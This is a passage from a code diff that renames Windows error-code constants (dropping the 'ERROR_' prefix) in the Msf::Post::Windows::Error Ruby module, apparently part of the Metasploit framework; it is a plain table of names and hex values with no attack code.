END_OF_MEDIA = 0x044C + FILEMARK_DETECTED = 0x044D + BEGINNING_OF_MEDIA = 0x044E + SETMARK_DETECTED = 0x044F + NO_DATA_DETECTED = 0x0450 + PARTITION_FAILURE = 0x0451 + INVALID_BLOCK_LENGTH = 0x0452 + DEVICE_NOT_PARTITIONED = 0x0453 + UNABLE_TO_LOCK_MEDIA = 0x0454 + UNABLE_TO_UNLOAD_MEDIA = 0x0455 + MEDIA_CHANGED = 0x0456 + BUS_RESET = 0x0457 + NO_MEDIA_IN_DRIVE = 0x0458 + NO_UNICODE_TRANSLATION = 0x0459 + DLL_INIT_FAILED = 0x045A + SHUTDOWN_IN_PROGRESS = 0x045B + NO_SHUTDOWN_IN_PROGRESS = 0x045C + IO_DEVICE = 0x045D + SERIAL_NO_DEVICE = 0x045E + IRQ_BUSY = 0x045F + MORE_WRITES = 0x0460 + COUNTER_TIMEOUT = 0x0461 + FLOPPY_ID_MARK_NOT_FOUND = 0x0462 + FLOPPY_WRONG_CYLINDER = 0x0463 + FLOPPY_UNKNOWN_ERROR = 0x0464 + FLOPPY_BAD_REGISTERS = 0x0465 + DISK_RECALIBRATE_FAILED = 0x0466 + DISK_OPERATION_FAILED = 0x0467 + DISK_RESET_FAILED = 0x0468 + EOM_OVERFLOW = 0x0469 + NOT_ENOUGH_SERVER_MEMORY = 0x046A + POSSIBLE_DEADLOCK = 0x046B + MAPPED_ALIGNMENT = 0x046C + SET_POWER_STATE_VETOED = 0x0474 + SET_POWER_STATE_FAILED = 0x0475 + TOO_MANY_LINKS = 0x0476 + OLD_WIN_VERSION = 0x047E + APP_WRONG_OS = 0x047F + SINGLE_INSTANCE_APP = 0x0480 + RMODE_APP = 0x0481 + INVALID_DLL = 0x0482 + NO_ASSOCIATION = 0x0483 + DDE_FAIL = 0x0484 + DLL_NOT_FOUND = 0x0485 + NO_MORE_USER_HANDLES = 0x0486 + MESSAGE_SYNC_ONLY = 0x0487 + SOURCE_ELEMENT_EMPTY = 0x0488 + DESTINATION_ELEMENT_FULL = 0x0489 + ILLEGAL_ELEMENT_ADDRESS = 0x048A + MAGAZINE_NOT_PRESENT = 0x048B + DEVICE_REINITIALIZATION_NEEDED = 0x048C + DEVICE_REQUIRES_CLEANING = 0x048D + DEVICE_DOOR_OPEN = 0x048E + DEVICE_NOT_CONNECTED = 0x048F + NOT_FOUND = 0x0490 + NO_MATCH = 0x0491 + SET_NOT_FOUND = 0x0492 + POINT_NOT_FOUND = 0x0493 + NO_TRACKING_SERVICE = 0x0494 + NO_VOLUME_ID = 0x0495 + UNABLE_TO_REMOVE_REPLACED = 0x0497 + UNABLE_TO_MOVE_REPLACEMENT = 0x0498 + UNABLE_TO_MOVE_REPLACEMENT_2 = 0x0499 + JOURNAL_DELETE_IN_PROGRESS = 0x049A + JOURNAL_NOT_ACTIVE = 0x049B + POTENTIAL_FILE_FOUND = 0x049C + JOURNAL_ENTRY_DELETED = 0x049D + SHUTDOWN_IS_SCHEDULED = 0x04A6 + SHUTDOWN_USERS_LOGGED_ON = 0x04A7 + BAD_DEVICE = 0x04B0 + CONNECTION_UNAVAIL = 0x04B1 + DEVICE_ALREADY_REMEMBERED = 0x04B2 + NO_NET_OR_BAD_PATH = 0x04B3 + BAD_PROVIDER = 0x04B4 + CANNOT_OPEN_PROFILE = 0x04B5 + BAD_PROFILE = 0x04B6 + NOT_CONTAINER = 0x04B7 + EXTENDED_ERROR = 0x04B8 + INVALID_GROUPNAME = 0x04B9 + INVALID_COMPUTERNAME = 0x04BA + INVALID_EVENTNAME = 0x04BB + INVALID_DOMAINNAME = 0x04BC + INVALID_SERVICENAME = 0x04BD + INVALID_NETNAME = 0x04BE + INVALID_SHARENAME = 0x04BF + INVALID_PASSWORDNAME = 0x04C0 + INVALID_MESSAGENAME = 0x04C1 + INVALID_MESSAGEDEST = 0x04C2 + SESSION_CREDENTIAL_CONFLICT = 0x04C3 + REMOTE_SESSION_LIMIT_EXCEEDED = 0x04C4 + DUP_DOMAINNAME = 0x04C5 + NO_NETWORK = 0x04C6 + CANCELLED = 0x04C7 + USER_MAPPED_FILE = 0x04C8 + CONNECTION_REFUSED = 0x04C9 + GRACEFUL_DISCONNECT = 0x04CA + ADDRESS_ALREADY_ASSOCIATED = 0x04CB + ADDRESS_NOT_ASSOCIATED = 0x04CC + CONNECTION_INVALID = 0x04CD + CONNECTION_ACTIVE = 0x04CE + NETWORK_UNREACHABLE = 0x04CF + HOST_UNREACHABLE = 0x04D0 + PROTOCOL_UNREACHABLE = 0x04D1 + PORT_UNREACHABLE = 0x04D2 + REQUEST_ABORTED = 0x04D3 + CONNECTION_ABORTED = 0x04D4 + RETRY = 0x04D5 + CONNECTION_COUNT_LIMIT = 0x04D6 + LOGIN_TIME_RESTRICTION = 0x04D7 + LOGIN_WKSTA_RESTRICTION = 0x04D8 + INCORRECT_ADDRESS = 0x04D9 + ALREADY_REGISTERED = 0x04DA + SERVICE_NOT_FOUND = 0x04DB + NOT_AUTHENTICATED = 0x04DC + NOT_LOGGED_ON = 0x04DD + CONTINUE = 0x04DE + ALREADY_INITIALIZED = 0x04DF + NO_MORE_DEVICES = 0x04E0 + NO_SUCH_SITE = 0x04E1 + DOMAIN_CONTROLLER_EXISTS = 0x04E2 + ONLY_IF_CONNECTED = 0x04E3 + OVERRIDE_NOCHANGES = 0x04E4 + BAD_USER_PROFILE = 0x04E5 + NOT_SUPPORTED_ON_SBS = 0x04E6 + SERVER_SHUTDOWN_IN_PROGRESS = 0x04E7 + HOST_DOWN = 0x04E8 + NON_ACCOUNT_SID = 0x04E9 + NON_DOMAIN_SID = 0x04EA + APPHELP_BLOCK = 0x04EB + ACCESS_DISABLED_BY_POLICY = 0x04EC + REG_NAT_CONSUMPTION = 0x04ED + CSCSHARE_OFFLINE = 0x04EE + PKINIT_FAILURE = 0x04EF + SMARTCARD_SUBSYSTEM_FAILURE = 0x04F0 + DOWNGRADE_DETECTED = 0x04F1 + MACHINE_LOCKED = 0x04F7 + CALLBACK_SUPPLIED_INVALID_DATA = 0x04F9 + SYNC_FOREGROUND_REFRESH_REQUIRED = 0x04FA + DRIVER_BLOCKED = 0x04FB + INVALID_IMPORT_OF_NON_DLL = 0x04FC + ACCESS_DISABLED_WEBBLADE = 0x04FD + ACCESS_DISABLED_WEBBLADE_TAMPER = 0x04FE + RECOVERY_FAILURE = 0x04FF + ALREADY_FIBER = 0x0500 + ALREADY_THREAD = 0x0501 + STACK_BUFFER_OVERRUN = 0x0502 + PARAMETER_QUOTA_EXCEEDED = 0x0503 + DEBUGGER_INACTIVE = 0x0504 + DELAY_LOAD_FAILED = 0x0505 + VDM_DISALLOWED = 0x0506 + UNIDENTIFIED_ERROR = 0x0507 + INVALID_CRUNTIME_PARAMETER = 0x0508 + BEYOND_VDL = 0x0509 + INCOMPATIBLE_SERVICE_SID_TYPE = 0x050A + DRIVER_PROCESS_TERMINATED = 0x050B + IMPLEMENTATION_LIMIT = 0x050C + PROCESS_IS_PROTECTED = 0x050D + SERVICE_NOTIFY_CLIENT_LAGGING = 0x050E + DISK_QUOTA_EXCEEDED = 0x050F + CONTENT_BLOCKED = 0x0510 + INCOMPATIBLE_SERVICE_PRIVILEGE = 0x0511 + INVALID_LABEL = 0x0513 + NOT_ALL_ASSIGNED = 0x0514 + SOME_NOT_MAPPED = 0x0515 + NO_QUOTAS_FOR_ACCOUNT = 0x0516 + LOCAL_USER_SESSION_KEY = 0x0517 + NULL_LM_PASSWORD = 0x0518 + UNKNOWN_REVISION = 0x0519 + REVISION_MISMATCH = 0x051A + INVALID_OWNER = 0x051B + INVALID_PRIMARY_GROUP = 0x051C + NO_IMPERSONATION_TOKEN = 0x051D + CANT_DISABLE_MANDATORY = 0x051E + NO_LOGON_SERVERS = 0x051F + NO_SUCH_LOGON_SESSION = 0x0520 + NO_SUCH_PRIVILEGE = 0x0521 + PRIVILEGE_NOT_HELD = 0x0522 + INVALID_ACCOUNT_NAME = 0x0523 + USER_EXISTS = 0x0524 + NO_SUCH_USER = 0x0525 + GROUP_EXISTS = 0x0526 + NO_SUCH_GROUP = 0x0527 + MEMBER_IN_GROUP = 0x0528 + MEMBER_NOT_IN_GROUP = 0x0529 + LAST_ADMIN = 0x052A + WRONG_PASSWORD = 0x052B + ILL_FORMED_PASSWORD = 0x052C + PASSWORD_RESTRICTION = 0x052D + LOGON_FAILURE = 0x052E + ACCOUNT_RESTRICTION = 0x052F + INVALID_LOGON_HOURS = 0x0530 + INVALID_WORKSTATION = 0x0531 + PASSWORD_EXPIRED = 0x0532 + ACCOUNT_DISABLED = 0x0533 + NONE_MAPPED = 0x0534 + TOO_MANY_LUIDS_REQUESTED = 0x0535 + LUIDS_EXHAUSTED = 0x0536 + INVALID_SUB_AUTHORITY = 0x0537 + INVALID_ACL = 0x0538 + INVALID_SID = 0x0539 + INVALID_SECURITY_DESCR = 0x053A + BAD_INHERITANCE_ACL = 0x053C + SERVER_DISABLED = 0x053D + SERVER_NOT_DISABLED = 0x053E + INVALID_ID_AUTHORITY = 0x053F + ALLOTTED_SPACE_EXCEEDED = 0x0540 + INVALID_GROUP_ATTRIBUTES = 0x0541 + BAD_IMPERSONATION_LEVEL = 0x0542 + CANT_OPEN_ANONYMOUS = 0x0543 + BAD_VALIDATION_CLASS = 0x0544 + BAD_TOKEN_TYPE = 0x0545 + NO_SECURITY_ON_OBJECT = 0x0546 + CANT_ACCESS_DOMAIN_INFO = 0x0547 + INVALID_SERVER_STATE = 0x0548 + INVALID_DOMAIN_STATE = 0x0549 + INVALID_DOMAIN_ROLE = 0x054A + NO_SUCH_DOMAIN = 0x054B + DOMAIN_EXISTS = 0x054C + DOMAIN_LIMIT_EXCEEDED = 0x054D + INTERNAL_DB_CORRUPTION = 0x054E + INTERNAL_ERROR = 0x054F + GENERIC_NOT_MAPPED = 0x0550 + BAD_DESCRIPTOR_FORMAT = 0x0551 + NOT_LOGON_PROCESS = 0x0552 + LOGON_SESSION_EXISTS = 0x0553 + NO_SUCH_PACKAGE = 0x0554 + BAD_LOGON_SESSION_STATE = 0x0555 + LOGON_SESSION_COLLISION = 0x0556 + INVALID_LOGON_TYPE = 0x0557 + CANNOT_IMPERSONATE = 0x0558 + RXACT_INVALID_STATE = 0x0559 + RXACT_COMMIT_FAILURE = 0x055A + SPECIAL_ACCOUNT = 0x055B + SPECIAL_GROUP = 0x055C + SPECIAL_USER = 0x055D + MEMBERS_PRIMARY_GROUP = 0x055E + TOKEN_ALREADY_IN_USE = 0x055F + NO_SUCH_ALIAS = 0x0560 + MEMBER_NOT_IN_ALIAS = 0x0561 + MEMBER_IN_ALIAS = 0x0562 + ALIAS_EXISTS = 0x0563 + LOGON_NOT_GRANTED = 0x0564 + TOO_MANY_SECRETS = 0x0565 + SECRET_TOO_LONG = 0x0566 + INTERNAL_DB_ERROR = 0x0567 + TOO_MANY_CONTEXT_IDS = 0x0568 + LOGON_TYPE_NOT_GRANTED = 0x0569 + NT_CROSS_ENCRYPTION_REQUIRED = 0x056A + NO_SUCH_MEMBER = 0x056B + INVALID_MEMBER = 0x056C + TOO_MANY_SIDS = 0x056D + LM_CROSS_ENCRYPTION_REQUIRED = 0x056E + NO_INHERITANCE = 0x056F + FILE_CORRUPT = 0x0570 + DISK_CORRUPT = 0x0571 + NO_USER_SESSION_KEY = 0x0572 + LICENSE_QUOTA_EXCEEDED = 0x0573 + WRONG_TARGET_NAME = 0x0574 + MUTUAL_AUTH_FAILED = 0x0575 + TIME_SKEW = 0x0576 + CURRENT_DOMAIN_NOT_ALLOWED = 0x0577 + INVALID_WINDOW_HANDLE = 0x0578 + INVALID_MENU_HANDLE = 0x0579 + INVALID_CURSOR_HANDLE = 0x057A + INVALID_ACCEL_HANDLE = 0x057B + INVALID_HOOK_HANDLE = 0x057C + INVALID_DWP_HANDLE = 0x057D + TLW_WITH_WSCHILD = 0x057E + CANNOT_FIND_WND_CLASS = 0x057F + WINDOW_OF_OTHER_THREAD = 0x0580 + HOTKEY_ALREADY_REGISTERED = 0x0581 + CLASS_ALREADY_EXISTS = 0x0582 + CLASS_DOES_NOT_EXIST = 0x0583 + CLASS_HAS_WINDOWS = 0x0584 + INVALID_INDEX = 0x0585 + INVALID_ICON_HANDLE = 0x0586 + PRIVATE_DIALOG_INDEX = 0x0587 + LISTBOX_ID_NOT_FOUND = 0x0588 + NO_WILDCARD_CHARACTERS = 0x0589 + CLIPBOARD_NOT_OPEN = 0x058A + HOTKEY_NOT_REGISTERED = 0x058B + WINDOW_NOT_DIALOG = 0x058C + CONTROL_ID_NOT_FOUND = 0x058D + INVALID_COMBOBOX_MESSAGE = 0x058E + WINDOW_NOT_COMBOBOX = 0x058F + INVALID_EDIT_HEIGHT = 0x0590 + DC_NOT_FOUND = 0x0591 + INVALID_HOOK_FILTER = 0x0592 + INVALID_FILTER_PROC = 0x0593 + HOOK_NEEDS_HMOD = 0x0594 + GLOBAL_ONLY_HOOK = 0x0595 + JOURNAL_HOOK_SET = 0x0596 + HOOK_NOT_INSTALLED = 0x0597 + INVALID_LB_MESSAGE = 0x0598 + SETCOUNT_ON_BAD_LB = 0x0599 + LB_WITHOUT_TABSTOPS = 0x059A + DESTROY_OBJECT_OF_OTHER_THREAD = 0x059B + CHILD_WINDOW_MENU = 0x059C + NO_SYSTEM_MENU = 0x059D + INVALID_MSGBOX_STYLE = 0x059E + INVALID_SPI_VALUE = 0x059F + SCREEN_ALREADY_LOCKED = 0x05A0 + HWNDS_HAVE_DIFF_PARENT = 0x05A1 + NOT_CHILD_WINDOW = 0x05A2 + INVALID_GW_COMMAND = 0x05A3 + INVALID_THREAD_ID = 0x05A4 + NON_MDICHILD_WINDOW = 0x05A5 + POPUP_ALREADY_ACTIVE = 0x05A6 + NO_SCROLLBARS = 0x05A7 + INVALID_SCROLLBAR_RANGE = 0x05A8 + INVALID_SHOWWIN_COMMAND = 0x05A9 + NO_SYSTEM_RESOURCES = 0x05AA + NONPAGED_SYSTEM_RESOURCES = 0x05AB + PAGED_SYSTEM_RESOURCES = 0x05AC + WORKING_SET_QUOTA = 0x05AD + PAGEFILE_QUOTA = 0x05AE + COMMITMENT_LIMIT = 0x05AF + MENU_ITEM_NOT_FOUND = 0x05B0 + INVALID_KEYBOARD_HANDLE = 0x05B1 + HOOK_TYPE_NOT_ALLOWED = 0x05B2 + REQUIRES_INTERACTIVE_WINDOWSTATION = 0x05B3 + TIMEOUT = 0x05B4 + INVALID_MONITOR_HANDLE = 0x05B5 + INCORRECT_SIZE = 0x05B6 + SYMLINK_CLASS_DISABLED = 0x05B7 + SYMLINK_NOT_SUPPORTED = 0x05B8 + XML_PARSE_ERROR = 0x05B9 + XMLDSIG_ERROR = 0x05BA + RESTART_APPLICATION = 0x05BB + WRONG_COMPARTMENT = 0x05BC + AUTHIP_FAILURE = 0x05BD + NO_NVRAM_RESOURCES = 0x05BE + EVENTLOG_FILE_CORRUPT = 0x05DC + EVENTLOG_CANT_START = 0x05DD + LOG_FILE_FULL = 0x05DE + EVENTLOG_FILE_CHANGED = 0x05DF + INVALID_TASK_NAME = 0x060E + INVALID_TASK_INDEX = 0x060F + THREAD_ALREADY_IN_TASK = 0x0610 + INSTALL_SERVICE_FAILURE = 0x0641 + INSTALL_USEREXIT = 0x0642 + INSTALL_FAILURE = 0x0643 + INSTALL_SUSPEND = 0x0644 + UNKNOWN_PRODUCT = 0x0645 + UNKNOWN_FEATURE = 0x0646 + UNKNOWN_COMPONENT = 0x0647 + UNKNOWN_PROPERTY = 0x0648 + INVALID_HANDLE_STATE = 0x0649 + BAD_CONFIGURATION = 0x064A + INDEX_ABSENT = 0x064B + INSTALL_SOURCE_ABSENT = 0x064C + INSTALL_PACKAGE_VERSION = 0x064D + PRODUCT_UNINSTALLED = 0x064E + BAD_QUERY_SYNTAX = 0x064F + INVALID_FIELD = 0x0650 + DEVICE_REMOVED = 0x0651 + INSTALL_ALREADY_RUNNING = 0x0652 + INSTALL_PACKAGE_OPEN_FAILED = 0x0653 + INSTALL_PACKAGE_INVALID = 0x0654 + INSTALL_UI_FAILURE = 0x0655 + INSTALL_LOG_FAILURE = 0x0656 + INSTALL_LANGUAGE_UNSUPPORTED = 0x0657 + INSTALL_TRANSFORM_FAILURE = 0x0658 + INSTALL_PACKAGE_REJECTED = 0x0659 + FUNCTION_NOT_CALLED = 0x065A + FUNCTION_FAILED = 0x065B + INVALID_TABLE = 0x065C + DATATYPE_MISMATCH = 0x065D + UNSUPPORTED_TYPE = 0x065E + CREATE_FAILED = 0x065F + INSTALL_TEMP_UNWRITABLE = 0x0660 + INSTALL_PLATFORM_UNSUPPORTED = 0x0661 + INSTALL_NOTUSED = 0x0662 + PATCH_PACKAGE_OPEN_FAILED = 0x0663 + PATCH_PACKAGE_INVALID = 0x0664 + PATCH_PACKAGE_UNSUPPORTED = 0x0665 + PRODUCT_VERSION = 0x0666 + INVALID_COMMAND_LINE = 0x0667 + INSTALL_REMOTE_DISALLOWED = 0x0668 + SUCCESS_REBOOT_INITIATED = 0x0669 + PATCH_TARGET_NOT_FOUND = 0x066A + PATCH_PACKAGE_REJECTED = 0x066B + INSTALL_TRANSFORM_REJECTED = 0x066C + INSTALL_REMOTE_PROHIBITED = 0x066D + PATCH_REMOVAL_UNSUPPORTED = 0x066E + UNKNOWN_PATCH = 0x066F + PATCH_NO_SEQUENCE = 0x0670 + PATCH_REMOVAL_DISALLOWED = 0x0671 + INVALID_PATCH_XML = 0x0672 + PATCH_MANAGED_ADVERTISED_PRODUCT = 0x0673 + INSTALL_SERVICE_SAFEBOOT = 0x0674 + FAIL_FAST_EXCEPTION = 0x0675 RPC_S_INVALID_STRING_BINDING = 0x06A4 RPC_S_WRONG_KIND_OF_BINDING = 0x06A5 RPC_S_INVALID_BINDING = 0x06A6 @@ -1006,39 +1006,39 @@ module Msf::Post::Windows::Error RPC_X_ENUM_VALUE_OUT_OF_RANGE = 0x06F5 RPC_X_BYTE_COUNT_TOO_SMALL = 0x06F6 RPC_X_BAD_STUB_DATA = 0x06F7 - ERROR_INVALID_USER_BUFFER = 0x06F8 - ERROR_UNRECOGNIZED_MEDIA = 0x06F9 - ERROR_NO_TRUST_LSA_SECRET = 0x06FA - ERROR_NO_TRUST_SAM_ACCOUNT = 0x06FB - ERROR_TRUSTED_DOMAIN_FAILURE = 0x06FC - ERROR_TRUSTED_RELATIONSHIP_FAILURE = 0x06FD - ERROR_TRUST_FAILURE = 0x06FE + INVALID_USER_BUFFER = 0x06F8 + UNRECOGNIZED_MEDIA = 0x06F9 + NO_TRUST_LSA_SECRET = 0x06FA + NO_TRUST_SAM_ACCOUNT = 0x06FB + TRUSTED_DOMAIN_FAILURE = 0x06FC + TRUSTED_RELATIONSHIP_FAILURE = 0x06FD + TRUST_FAILURE = 0x06FE RPC_S_CALL_IN_PROGRESS = 0x06FF - ERROR_NETLOGON_NOT_STARTED = 0x0700 - ERROR_ACCOUNT_EXPIRED = 0x0701 - ERROR_REDIRECTOR_HAS_OPEN_HANDLES = 0x0702 - ERROR_PRINTER_DRIVER_ALREADY_INSTALLED = 0x0703 - ERROR_UNKNOWN_PORT = 0x0704 - ERROR_UNKNOWN_PRINTER_DRIVER = 0x0705 - ERROR_UNKNOWN_PRINTPROCESSOR = 0x0706 - ERROR_INVALID_SEPARATOR_FILE = 0x0707 - ERROR_INVALID_PRIORITY = 0x0708 - ERROR_INVALID_PRINTER_NAME = 0x0709 - ERROR_PRINTER_ALREADY_EXISTS = 0x070A - ERROR_INVALID_PRINTER_COMMAND = 0x070B - ERROR_INVALID_DATATYPE = 0x070C - ERROR_INVALID_ENVIRONMENT = 0x070D + NETLOGON_NOT_STARTED = 0x0700 + ACCOUNT_EXPIRED = 0x0701 + REDIRECTOR_HAS_OPEN_HANDLES = 0x0702 + PRINTER_DRIVER_ALREADY_INSTALLED = 0x0703 + UNKNOWN_PORT = 0x0704 + UNKNOWN_PRINTER_DRIVER = 0x0705 + UNKNOWN_PRINTPROCESSOR = 0x0706 + INVALID_SEPARATOR_FILE = 0x0707 + INVALID_PRIORITY = 0x0708 + INVALID_PRINTER_NAME = 0x0709 + PRINTER_ALREADY_EXISTS = 0x070A + INVALID_PRINTER_COMMAND = 0x070B + INVALID_DATATYPE = 0x070C + INVALID_ENVIRONMENT = 0x070D RPC_S_NO_MORE_BINDINGS = 0x070E - ERROR_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT = 0x070F - ERROR_NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0x0710 - ERROR_NOLOGON_SERVER_TRUST_ACCOUNT = 0x0711 - ERROR_DOMAIN_TRUST_INCONSISTENT = 0x0712 - ERROR_SERVER_HAS_OPEN_HANDLES = 0x0713 - ERROR_RESOURCE_DATA_NOT_FOUND = 0x0714 - ERROR_RESOURCE_TYPE_NOT_FOUND = 0x0715 - ERROR_RESOURCE_NAME_NOT_FOUND = 0x0716 - ERROR_RESOURCE_LANG_NOT_FOUND = 0x0717 - ERROR_NOT_ENOUGH_QUOTA = 0x0718 + NOLOGON_INTERDOMAIN_TRUST_ACCOUNT = 0x070F + NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0x0710 + NOLOGON_SERVER_TRUST_ACCOUNT = 0x0711 + DOMAIN_TRUST_INCONSISTENT = 0x0712 + SERVER_HAS_OPEN_HANDLES = 0x0713 + RESOURCE_DATA_NOT_FOUND = 0x0714 + RESOURCE_TYPE_NOT_FOUND = 0x0715 + RESOURCE_NAME_NOT_FOUND = 0x0716 + RESOURCE_LANG_NOT_FOUND = 0x0717 + NOT_ENOUGH_QUOTA = 0x0718 RPC_S_NO_INTERFACES = 0x0719 RPC_S_CALL_CANCELLED = 0x071A RPC_S_BINDING_INCOMPLETE = 0x071B @@ -1059,15 +1059,15 @@ module Msf::Post::Windows::Error RPC_S_GROUP_MEMBER_NOT_FOUND = 0x076A EPT_S_CANT_CREATE = 0x076B RPC_S_INVALID_OBJECT = 0x076C - ERROR_INVALID_TIME = 0x076D - ERROR_INVALID_FORM_NAME = 0x076E - ERROR_INVALID_FORM_SIZE = 0x076F - ERROR_ALREADY_WAITING = 0x0770 - ERROR_PRINTER_DELETED = 0x0771 - ERROR_INVALID_PRINTER_STATE = 0x0772 - ERROR_PASSWORD_MUST_CHANGE = 0x0773 - ERROR_DOMAIN_CONTROLLER_NOT_FOUND = 0x0774 - ERROR_ACCOUNT_LOCKED_OUT = 0x0775 + INVALID_TIME = 0x076D + INVALID_FORM_NAME = 0x076E + INVALID_FORM_SIZE = 0x076F + ALREADY_WAITING = 0x0770 + PRINTER_DELETED = 0x0771 + INVALID_PRINTER_STATE = 0x0772 + PASSWORD_MUST_CHANGE = 0x0773 + DOMAIN_CONTROLLER_NOT_FOUND = 0x0774 + ACCOUNT_LOCKED_OUT = 0x0775 OR_INVALID_OXID = 0x0776 OR_INVALID_OID = 0x0777 OR_INVALID_SET = 0x0778 @@ -1077,9 +1077,9 @@ module Msf::Post::Windows::Error RPC_X_PIPE_CLOSED = 0x077C RPC_X_PIPE_DISCIPLINE_ERROR = 0x077D RPC_X_PIPE_EMPTY = 0x077E - ERROR_NO_SITENAME = 0x077F - ERROR_CANT_ACCESS_FILE = 0x0780 - ERROR_CANT_RESOLVE_FILENAME = 0x0781 + NO_SITENAME = 0x077F + CANT_ACCESS_FILE = 0x0780 + CANT_RESOLVE_FILENAME = 0x0781 RPC_S_ENTRY_TYPE_MISMATCH = 0x0782 RPC_S_NOT_ALL_OBJS_EXPORTED = 0x0783 RPC_S_INTERFACE_NOT_EXPORTED = 0x0784 @@ -1088,514 +1088,514 @@ module Msf::Post::Windows::Error RPC_S_PRF_ELT_NOT_REMOVED = 0x0787 RPC_S_GRP_ELT_NOT_ADDED = 0x0788 RPC_S_GRP_ELT_NOT_REMOVED = 0x0789 - ERROR_KM_DRIVER_BLOCKED = 0x078A - ERROR_CONTEXT_EXPIRED = 0x078B - ERROR_PER_USER_TRUST_QUOTA_EXCEEDED = 0x078C - ERROR_ALL_USER_TRUST_QUOTA_EXCEEDED = 0x078D - ERROR_USER_DELETE_TRUST_QUOTA_EXCEEDED = 0x078E - ERROR_AUTHENTICATION_FIREWALL_FAILED = 0x078F - ERROR_REMOTE_PRINT_CONNECTIONS_BLOCKED = 0x0790 - ERROR_NTLM_BLOCKED = 0x0791 - ERROR_INVALID_PIXEL_FORMAT = 0x07D0 - ERROR_BAD_DRIVER = 0x07D1 - ERROR_INVALID_WINDOW_STYLE = 0x07D2 - ERROR_METAFILE_NOT_SUPPORTED = 0x07D3 - ERROR_TRANSFORM_NOT_SUPPORTED = 0x07D4 - ERROR_CLIPPING_NOT_SUPPORTED = 0x07D5 - ERROR_INVALID_CMM = 0x07DA - ERROR_INVALID_PROFILE = 0x07DB - ERROR_TAG_NOT_FOUND = 0x07DC - ERROR_TAG_NOT_PRESENT = 0x07DD - ERROR_DUPLICATE_TAG = 0x07DE - ERROR_PROFILE_NOT_ASSOCIATED_WITH_DEVICE = 0x07DF - ERROR_PROFILE_NOT_FOUND = 0x07E0 - ERROR_INVALID_COLORSPACE = 0x07E1 - ERROR_ICM_NOT_ENABLED = 0x07E2 - ERROR_DELETING_ICM_XFORM = 0x07E3 - ERROR_INVALID_TRANSFORM = 0x07E4 - ERROR_COLORSPACE_MISMATCH = 0x07E5 - ERROR_INVALID_COLORINDEX = 0x07E6 - ERROR_PROFILE_DOES_NOT_MATCH_DEVICE = 0x07E7 - ERROR_CONNECTED_OTHER_PASSWORD = 0x083C - ERROR_CONNECTED_OTHER_PASSWORD_DEFAULT = 0x083D - ERROR_BAD_USERNAME = 0x089A - ERROR_NOT_CONNECTED = 0x08CA - ERROR_OPEN_FILES = 0x0961 - ERROR_ACTIVE_CONNECTIONS = 0x0962 - ERROR_DEVICE_IN_USE = 0x0964 - ERROR_UNKNOWN_PRINT_MONITOR = 0x0BB8 - ERROR_PRINTER_DRIVER_IN_USE = 0x0BB9 - ERROR_SPOOL_FILE_NOT_FOUND = 0x0BBA - ERROR_SPL_NO_STARTDOC = 0x0BBB - ERROR_SPL_NO_ADDJOB = 0x0BBC - ERROR_PRINT_PROCESSOR_ALREADY_INSTALLED = 0x0BBD - ERROR_PRINT_MONITOR_ALREADY_INSTALLED = 0x0BBE - ERROR_INVALID_PRINT_MONITOR = 0x0BBF - ERROR_PRINT_MONITOR_IN_USE = 0x0BC0 - ERROR_PRINTER_HAS_JOBS_QUEUED = 0x0BC1 - ERROR_SUCCESS_REBOOT_REQUIRED = 0x0BC2 - ERROR_SUCCESS_RESTART_REQUIRED = 0x0BC3 - ERROR_PRINTER_NOT_FOUND = 0x0BC4 - ERROR_PRINTER_DRIVER_WARNED = 0x0BC5 - ERROR_PRINTER_DRIVER_BLOCKED = 0x0BC6 - ERROR_PRINTER_DRIVER_PACKAGE_IN_USE = 0x0BC7 - ERROR_CORE_DRIVER_PACKAGE_NOT_FOUND = 0x0BC8 - ERROR_FAIL_REBOOT_REQUIRED = 0x0BC9 - ERROR_FAIL_REBOOT_INITIATED = 0x0BCA - ERROR_PRINTER_DRIVER_DOWNLOAD_NEEDED = 0x0BCB - ERROR_PRINT_JOB_RESTART_REQUIRED = 0x0BCC - ERROR_IO_REISSUE_AS_CACHED = 0x0F6E - ERROR_WINS_INTERNAL = 0x0FA0 - ERROR_CAN_NOT_DEL_LOCAL_WINS = 0x0FA1 - ERROR_STATIC_INIT = 0x0FA2 - ERROR_INC_BACKUP = 0x0FA3 - ERROR_FULL_BACKUP = 0x0FA4 - ERROR_REC_NON_EXISTENT = 0x0FA5 - ERROR_RPL_NOT_ALLOWED = 0x0FA6 - PEERDIST_ERROR_CONTENTINFO_VERSION_UNSUPPORTED = 0x0FD2 - PEERDIST_ERROR_CANNOT_PARSE_CONTENTINFO = 0x0FD3 - PEERDIST_ERROR_MISSING_DATA = 0x0FD4 - PEERDIST_ERROR_NO_MORE = 0x0FD5 - PEERDIST_ERROR_NOT_INITIALIZED = 0x0FD6 - PEERDIST_ERROR_ALREADY_INITIALIZED = 0x0FD7 - PEERDIST_ERROR_SHUTDOWN_IN_PROGRESS = 0x0FD8 - PEERDIST_ERROR_INVALIDATED = 0x0FD9 - PEERDIST_ERROR_ALREADY_EXISTS = 0x0FDA - PEERDIST_ERROR_OPERATION_NOTFOUND = 0x0FDB - PEERDIST_ERROR_ALREADY_COMPLETED = 0x0FDC - PEERDIST_ERROR_OUT_OF_BOUNDS = 0x0FDD - PEERDIST_ERROR_VERSION_UNSUPPORTED = 0x0FDE - PEERDIST_ERROR_INVALID_CONFIGURATION = 0x0FDF - PEERDIST_ERROR_NOT_LICENSED = 0x0FE0 - PEERDIST_ERROR_SERVICE_UNAVAILABLE = 0x0FE1 - ERROR_DHCP_ADDRESS_CONFLICT = 0x1004 - ERROR_WMI_GUID_NOT_FOUND = 0x1068 - ERROR_WMI_INSTANCE_NOT_FOUND = 0x1069 - ERROR_WMI_ITEMID_NOT_FOUND = 0x106A - ERROR_WMI_TRY_AGAIN = 0x106B - ERROR_WMI_DP_NOT_FOUND = 0x106C - ERROR_WMI_UNRESOLVED_INSTANCE_REF = 0x106D - ERROR_WMI_ALREADY_ENABLED = 0x106E - ERROR_WMI_GUID_DISCONNECTED = 0x106F - ERROR_WMI_SERVER_UNAVAILABLE = 0x1070 - ERROR_WMI_DP_FAILED = 0x1071 - ERROR_WMI_INVALID_MOF = 0x1072 - ERROR_WMI_INVALID_REGINFO = 0x1073 - ERROR_WMI_ALREADY_DISABLED = 0x1074 - ERROR_WMI_READ_ONLY = 0x1075 - ERROR_WMI_SET_FAILURE = 0x1076 - ERROR_INVALID_MEDIA = 0x10CC - ERROR_INVALID_LIBRARY = 0x10CD - ERROR_INVALID_MEDIA_POOL 